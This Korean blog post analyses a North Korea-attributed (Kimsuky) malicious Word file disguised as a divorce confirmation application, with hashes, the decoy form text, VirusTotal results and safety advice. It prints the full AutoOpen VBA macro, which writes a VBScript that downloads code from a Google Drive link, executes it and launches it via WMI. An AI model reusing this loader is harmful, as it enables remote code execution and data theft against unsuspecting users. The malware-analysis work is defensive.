꿈을꾸는 파랑새

오늘은 북한 해킹 조직 중 하나인 김수키(Kimsuky,キムスキー)는 기본적으로 한국의 싱크탱크,산업계,원자력 발전소 그리고 대북 관계자, 그리고 탈북단체에서 운영하는 주요인물을 대상으로 조직적으로 해킹하고 있으며 한국의 퇴역 장교(특히 대북 기밀 다루었던 분), 전·현직 외교관, 전·현직 정부기관에 일하고 있든 일을 하고 있지 않든 아무튼 대북 관련 단체이며 해킹을 하고 있으며 그리고 최근 영업이 러시아, 미국 및 유럽 국가로 확장하고 있으며
김수키 라는 이름은 이 그룹의 공격을 처음 보고한 러시아의 보안기업 카스퍼스키 가 도난당한 정보를 보내는 이메일 계정 이름이 김숙향(Kimsukyang)이었기 때문이며 Gold Dragon,Babyshark,Appleseed 등 수많은 악성코드를 사용했으며 전직 이름 탈륨(Thallium), 벨벳 천리마(Velvet Chollima), 블랙반시(Black Banshee) 등으로 불리고 있으며 최근에는 협의 이혼 의사 확인 신청서이라는 이름으로 악성코드를 유포하고 있습니다.

즉 일반인들로 대상을 넓히는 것을 개인적으로 판단하고 되며 아마도 이혼하시는 분들의 개인정보도 수집해서 악용하려는 것 같습니다.
먼저 해쉬값은 다음과 같습니다.
파일명:협의이혼의사확인신청서.doc
사이즈:31.0 KB
CRC32:446351f1
MD5:716b5e039177f7f6d50404bde0be9e4b
SHA-1:b4635d3d6adbe3c0674032db712e26cfeb0669e3
SHA-256:ea451e5c064f79f66433d2311e90b965d1ee26cabc411f633d826cdb6920b83e

협의 이혼 의사 확인 신청서 워드 악성코드 실행
협의 이혼 의사 확인 신청서 워드 악성코드 실행

[소프트웨어 팁/보안 및 분석] - 북한 김수키(Kimsuky)워드 악성코드-협의 이혼 의사 확인 신청서.doc

 

북한 김수키(Kimsuky)워드 악성코드-협의 이혼 의사 확인 신청서.doc

오늘은 북한 해킹 조직 중 하나인 김수키(Kimsuky,キムスキー)는 기본적으로 한국의 싱크탱크,산업계,원자력 발전소 그리고 대북 관계자, 그리고 탈북단체에서 운영하는 주요인물을 대상으로 조

wezard4u.tistory.com

지난 시간에 악성코드를 분석했던 협의 이혼 의사 확인 신청서·doc하고 똑같이 매크로로 작동합니다.
해당 문서의 내용은 다음과 같습니다.

[서식 제2-2호]
협의이혼의사확인신청서
당사자부 (주민등록번호: - )
등록기준지:
주소:                                       
전화번호(휴대전화/집전화):              
처(주민등록번호: - )
등록기준지:
주소:           
전화번호(휴대전화/집전화):                        
신청의 취지
위 당사자 사이에는 진의에 따라 서로 이혼하기로 합의하였다.
위와 같이 이혼의사가 확인되었다.
라는 확인을 구합니다.
첨부서류
1. 남편의 혼인관계증명서와 가족관계증명서(상세) 각 1통.
처의 혼인관계증명서와 가족관계증명서(상세) 각 1통. 
2. 주민등록표등본(주소지 관할법원에 신청하는 경우) 1통.
3. 진술요지서(재외공관에 접수한 경우) 1통.  끝. 
 20.     .    
확인기일담당자
1회년 월 일 시	원주사(보) 
       인
2회 년 월 일 시	
확인서등본 교부교부일
부 인
처  인	
신청인  부(서명 또는 날인)
처(서명 또는 날인)
법원  귀중
※ 이혼에 관한 안내를 받지 않았으면 접수한 날부터 3개월이 지나면 취하한 것으로 봅니다.

협의 이혼 의사 확인 신청서 워드 메세지 출력
협의 이혼 의사 확인 신청서 워드 메세지 출력

일단 매크로를 실행하면 다음과 같이 동작을 합니다.

wscript.exe //e:vbscript //b C:\Users\admin\AppData\Roaming\Microsoft\Templates\version.ini
해당 명령어는 wscript.exe라는 실행 파일을 호출하여 VBScrip트 언어로 작성된 스크립트 파일인 C:\Users\admin\AppData\Roaming\Microsoft\Templates\version.ini 를 실행하는 것입니다. VBScrip 는 Microsoft의 스크립팅 언어로, Windows 운영체제에서 스크립트 기반 작업을 수행하는 데 사용을 합니다.
//e:vbscript:wscript.exe에 전달되는 옵션 중 하나로 실행할 스크립트 언어를 지정 여기서는 VBScrip트를 실행하기 위해 vbscript 로 설정
//b wscript.exe에 전달되는 또 다른 옵션 실행할 스크립트 파일의 경로를 지정 여기서는 C:\Users\admin\AppData\Roaming\Microsoft\Templates\version.ini 라는 VBScrip 파일을 실행하도록 설정
그리고 포함이 된 매크로 명령어는 다음과 같습니다.

협의 이혼 의사 확인 신청서 워드 매크로 악성코드
협의 이혼 의사 확인 신청서 워드 매크로 악성코드

Sub AutoOpen()
    On Error Resume Next
    sn = "utf"
    Set wm = GetObject("winmgmts:win32_process")
    pw = "utf8utf8"
    Weed sn, pw
    Present
    Set wnd = ActiveDocument
    wnd.Save
    cnt = "On Error Resume Next:Set mx = CreateObject(""MSXML2.ServerXMLHTTP""):
    mx.open ""GET"", ""https://drive.google(.)com/
    uc?export=download&id=1SoDzDxjeD9T-yPcpXXI1hWkYpwGq7-00&confirm=t"",
    False:mx.Send:Execute(mx.responseText)"
    pth = "C:\Users\" & Application.UserName & 
    "\AppData\Roaming\Microsoft\Templates\version.ini"
    ResContent pth, cnt
    wm.Create "wscript.exe //e:vbscript //b " & pth
End Sub

해당 코드는 VBA (Visual Basic for Applications)로 작성된 매크로 코드입니다.
Sub AutoOpen():해당 부분은 AutoOpen 이라는 매크로 서브루틴을 정의해서 AutoOpen 서브루틴은 문서가 열릴 때 자동으로 실행되게 해 놓았습니다.
On Error Resume Next: 에러가 발생했을 때 실행 흐름을 계속 진행하기 위해 사용되는 에러 처리 문구 해당 구문이 있으면 에러가 발생해도 프로그램이 중단되지 않고 계속 실행
sn = utf": 변수 sn에 utf 라는 문자열을 할당
Set wm = GetObject("winmgmts:win32_process")`: GetObject 함수를 사용하여 winmgmts:win32_process 를 나타내는 WMI(Windows Management Instrumentation) 개체를 가져와 wm 변수에 할당합 해당 개체를 통해 Windows 프로세스를 관리할 수 있음
cnt = "On Error Resume Next:Set mx = CreateObject(""MSXML2.ServerXMLHTTP""):mx.open ""GET"", "" https://drive.google(.)com/uc?export=download&id=1SoDzDxjeD9T-yPcpXXI1hWkYpwGq7-00&confirm=t "

매크로 조사식 실행
매크로 조사식 실행

False:mx.Send:Execute(mx.responseText):변수 cnt에 문자열 값을 할당 해당 문자열은 MSXML2.ServerXMLHTTP 개체를 사용하여 지정된 URL에서 데이터를 가져와 실행하는 
pth = C:\Users\" & Application.UserName & "\AppData\Roaming\Microsoft\Templates\version.ini:변수 pth에 C:\Users\와 Application.UserName 값을 연결하여 경로를 할당 해당 경로는 version.ini 파일을 나타냅니다.
ResContent pth, cnt: ResContent라는 서브루틴을 호출하고 pth와cnt 변수를 인수로 전달 해당 서브루틴은 아마도 pth 경로에 cnt 내용을 저장하는 작업을 수행
wm.Create wscript.exe //e:vbscript //b  & pth: wm` 변수가 나타내는 WMI 개체를 사용하여 wscript.exe를 실행하고 인수로 //e:vbscript //b 와 pth 값을 전달 pth 에 지정된 스크립트 파일을 실행
2023-06-28 00:31:50 UTC 기준 바이러스토탈(VirusTotal)탐지 하는 보안 업체들은 다음과 같습니다.
Acronis (Static ML):Suspicious
Alibaba:TrojanDownloader:Office/SAgent.38e77e69
Antiy-AVL:Trojan/MSOffice.SAgent.gen
Arcabit:HEUR.VBA.CG.2
Avast:Script:SNH-gen [Drp]
AVG:Script:SNH-gen [Drp]
Avira (no cloud):DR/Redcap.uxgjm
BitDefender:VB:Trojan.Valyria.8028
Elastic:Malicious (high Confidence)
Emsisoft:VB:Trojan.Valyria.8028 (B)
eScan:VB:Trojan.Valyria.8028
ESET-NOD32:VBA/TrojanDownloader.Agent.YWB
GData:VB:Trojan.Valyria.8028
Kaspersky:UDS:DangerousObject.Multi.Generic
Lionic:Trojan.MSWord.SAgent.4!c
MAX:Malware (ai Score=81)
McAfee-GW-Edition:Artemis!Trojan
Rising:Trojan.CodeLoader/VBA!1.DFBF (CLASSIC)
SentinelOne (Static ML):Static AI - Malicious OPENXML
TACHYON:Suspicious/WOX.XSR.Gen
Tencent:Trojan.MsOffice.MacroS.11026129
Trellix (FireEye):VB:Trojan.Valyria.8028
VIPRE:VB:Trojan.Valyria.8028
VirIT:Office.VBA_Macro_Heur
ZoneAlarm by Check Point:HEUR:Trojan.MSOffice.SAgent.gen
북한정찰총국의 지원을 받는 공격 집단의 공격 중 하나가 아닐까 생각이 됩니다.
기존의 대북 관련 분들을 대상으로 하던 것이 일반인으로 대상으로 확대되는 것을 생각되면 그리고 제일 중요한 것을 이런 악성코드는 기본적으로 지인이든 모르는 사람이든 간에 파일은 함부로 실행을 하는 것은 주의해야 하면 특히 매크로 실행을 해달라고 하면 바로 의심을 해야 하면 기본적으로 윈도우 디펜더 이든 안랩 V3이든 간에 백신 프로그램 설치해서 실시간 감시, 실시간 업데이트 통해서 해당 악성코드들은 차단할 수가 있을 것입니다.

반응형
그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band